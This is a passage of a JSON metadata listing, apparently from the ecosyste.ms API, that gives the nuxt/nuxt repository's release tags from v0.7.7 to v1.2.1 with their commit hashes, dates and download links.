1","sha":"f0bd9a573b3756a6f878b3964222679a8c58beaa","kind":"tag","published_at":"2018-01-26T12:24:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.1/manifests"},{"name":"v1.2.0","sha":"78494dac927681007ea6725b4548db8fd838ed16","kind":"tag","published_at":"2018-01-26T11:54:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.0/manifests"},{"name":"v1.1.1","sha":"6dce671498d0128662579cfb08dd7e3e67253261","kind":"tag","published_at":"2018-01-13T13:10:46.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"e33d5026966e23d71dc33078a9122bf4a9fccd61","kind":"commit","published_at":"2018-01-12T15:10:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.0/manifests"},{"name":"v1.1","sha":"e33d5026966e23d71dc33078a9122bf4a9fccd61","kind":"commit","published_at":"2018-01-12T15:10:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1/manifests"},{"name":"v1.0.1","sha":"e33d5026966e23d71dc33078a9122bf4a9fccd61","kind":"commit","published_at":"2018-01-12T15:10:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"b83d74588fa45018dd89bb6ab4b4305be7f6a50a","kind":"tag","published_at":"2018-01-08T16:07:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc11","sha":"034df15231fa7986cf626ccc48305a0ba0a6cba2","kind":"commit","published_at":"2017-09-07T12:53:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc11","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc11","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc11/manifests"},{"name":"v1.0.0-rc10","sha":"e24b4a7cc59e1b56b2a748682aa9180cd881097f","kind":"commit","published_at":"2017-09-07T12:31:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc10","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc10","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc10/manifests"},{"name":"v1.0.0-rc9","sha":"226a8701b4f18cf213adb8f474c052adf2376ded","kind":"commit","published_at":"2017-09-06T13:34:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc9/manifests"},{"name":"v1.0.0-rc8","sha":"63bc512d73660986546bd2428649d0299a6a0abd","kind":"commit","published_at":"2017-08-30T16:36:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc8/manifests"},{"name":"v1.0.0-rc7","sha":"138edc7bfdbc9617a3f4e245f9bd32d0fcfc3a2b","kind":"commit","published_at":"2017-08-29T12:04:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc7/manifests"},{"name":"v1.0.0-rc6","sha":"b931dd40cea828021f3092d1e224053a1baacba0","kind":"commit","published_at":"2017-08-21T20:08:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc6/manifests"},{"name":"v1.0.0-rc5","sha":"e34d9d69bb44301976e1ee78fcd454b904f7701a","kind":"commit","published_at":"2017-08-21T08:38:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc5/manifests"},{"name":"v1.0.0-rc3","sha":"533c8a9fb66e105ae8175bf31bff4eede5d733e1","kind":"commit","published_at":"2017-08-13T19:12:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc4","sha":"533c8a9fb66e105ae8175bf31bff4eede5d733e1","kind":"commit","published_at":"2017-08-13T19:12:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc4/manifests"},{"name":"1.0.0-rc3","sha":"8563c0f05fca617eb296544ac1f84f96cf470c5f","kind":"commit","published_at":"2017-07-28T08:40:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/1.0.0-rc3","html_url":"https://github.com/nuxt/nuxt/releases/tag/1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/1.0.0-rc3/manifests"},{"name":"v1.0.0-alpha.4","sha":"d15a50f539e74a510353d06e9a247e5cec77850e","kind":"commit","published_at":"2017-06-06T12:57:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.4/manifests"},{"name":"v1.0.0-alpha.3","sha":"2f32d03f83de48fc13718815e38197446d538b5e","kind":"commit","published_at":"2017-06-04T12:11:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.3/manifests"},{"name":"v1.0.0-alpha2","sha":"03f2e133b140d78870971ad4eadd00f14c244a2c","kind":"commit","published_at":"2017-05-29T15:04:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha2/manifests"},{"name":"v1.0.0-alpha1","sha":"7f337cdadf6e2b7b4b1a2b9f549c19aac33a794d","kind":"commit","published_at":"2017-05-21T19:08:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha1/manifests"},{"name":"v0.10.7","sha":"5d4f2899110b061ca8e084354e1a8b400280df14","kind":"commit","published_at":"2017-04-29T23:31:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.7/manifests"},{"name":"v0.10.6","sha":"854e262445db60f8bfee2483e3e723b7be4dc35a","kind":"commit","published_at":"2017-04-17T13:58:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.6/manifests"},{"name":"v0.10.5","sha":"704ff5e5775736cfe0e7030cbdc0b9cc2cb198d3","kind":"commit","published_at":"2017-03-25T23:54:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.5/manifests"},{"name":"v0.10.4","sha":"5ff6424e09eb2262b975c9c544c57e681fbf7591","kind":"commit","published_at":"2017-03-25T18:03:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.4/manifests"},{"name":"v0.10.3","sha":"c9784651e9c482ad90ec9c39359ac9dfd1e199bf","kind":"commit","published_at":"2017-03-25T11:57:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.3/manifests"},{"name":"v0.10.2","sha":"77439223cfb9d3c64928d8888113898f4b1fa5d3","kind":"commit","published_at":"2017-03-25T11:36:58.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.2/manifests"},{"name":"v0.10.1","sha":"ea5881e64a797ded299740017391f36ea7f94e09","kind":"commit","published_at":"2017-03-25T02:41:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.1/manifests"},{"name":"v0.10.0","sha":"bfe62b7d71d4ac64a4d411a83cec808824082b4f","kind":"commit","published_at":"2017-03-24T18:05:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.0/manifests"},{"name":"v0.9.9","sha":"df04b959c219789621f1f4ce239fb2f64c069eee","kind":"commit","published_at":"2017-02-10T23:41:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.9/manifests"},{"name":"v0.9.8","sha":"e7f0200a58f17d429b00641d015e6f7f87f99fd0","kind":"commit","published_at":"2017-02-10T01:22:33.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.8/manifests"},{"name":"v0.9.7","sha":"8d17d20dba2a81072173c68fa774d7a49cae716a","kind":"commit","published_at":"2017-01-30T11:41:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.7/manifests"},{"name":"v0.9.6","sha":"1556787e0164bdb4b15542dedf32762c481f274c","kind":"commit","published_at":"2017-01-15T16:33:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.6/manifests"},{"name":"v0.9.5","sha":"42a3b007514eea3e87a4bd0c083dad6524ecfead","kind":"commit","published_at":"2016-12-27T16:07:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.5/manifests"},{"name":"v0.9.4","sha":"05be1ed6b12e7d88fe7adc2af5ed0568cf40ddb0","kind":"commit","published_at":"2016-12-25T20:15:17.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.4/manifests"},{"name":"v0.9.3","sha":"1fc685a88037fdac0b826d8d814fcd1c3b320fda","kind":"commit","published_at":"2016-12-24T18:00:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.3/manifests"},{"name":"v0.9.2","sha":"2a9519e7203004955ffc70f0c8f762e6afeb9816","kind":"commit","published_at":"2016-12-23T12:09:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.2/manifests"},{"name":"v0.9.1","sha":"baaaefbf2c76f362fd0be9f34c1444e439e8c746","kind":"commit","published_at":"2016-12-20T11:55:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.1/manifests"},{"name":"v0.9.0","sha":"004e21b929b901ae54d92abf339c51a9d666b373","kind":"commit","published_at":"2016-12-19T19:37:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.0/manifests"},{"name":"v0.8.8","sha":"803b21bf17a21bac5eb97d84de35fa7d08c3b73e","kind":"commit","published_at":"2016-12-09T19:10:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.8/manifests"},{"name":"v0.8.6","sha":"d482711cbe2a9f50a6a4804bdf1292739dd581ab","kind":"commit","published_at":"2016-12-09T12:52:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.6/manifests"},{"name":"v0.8.5","sha":"151bd73b8250816c3918e52777e9a7387df7be4a","kind":"commit","published_at":"2016-12-09T12:46:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.5/manifests"},{"name":"v0.8.4","sha":"e254e1117736f73a3455b0f795e9f9bd9e0364ab","kind":"commit","published_at":"2016-12-08T20:15:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.4/manifests"},{"name":"v0.8.3","sha":"4895433d3383407dd243acc0718bc9fa33ad28ff","kind":"commit","published_at":"2016-12-08T10:43:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.3/manifests"},{"name":"v0.8.2","sha":"40e28de226dbefd24e228c801b28892ca91e33e4","kind":"commit","published_at":"2016-12-07T22:58:51.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.2/manifests"},{"name":"v0.8.1","sha":"78a2c5afe747c7009ff618a79f14ddf83c19efed","kind":"commit","published_at":"2016-12-07T22:44:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.1/manifests"},{"name":"v0.8.0","sha":"be5e8c118d1415e33031772daca422a0fae511bf","kind":"commit","published_at":"2016-12-07T18:43:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.0/manifests"},{"name":"v0.7.9","sha":"8801327db20c2e5daa594a7d8ad95d7a2a582a14","kind":"commit","published_at":"2016-12-04T18:16:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.9/manifests"},{"name":"v0.7.8","sha":"ddbffcc8af4393e14cc44daa94b4a27a21c6fadf","kind":"commit","published_at":"2016-12-01T18:09:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.8/manifests"},{"name":"v0.7.7","sha":"fdc430b23bac4a0cf86b0bc0da7828a573a0176d","kind":"commit","published_at":"2016-11-28T16:28:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.7","dependencies_parsed_at":null,"dependency_job_id"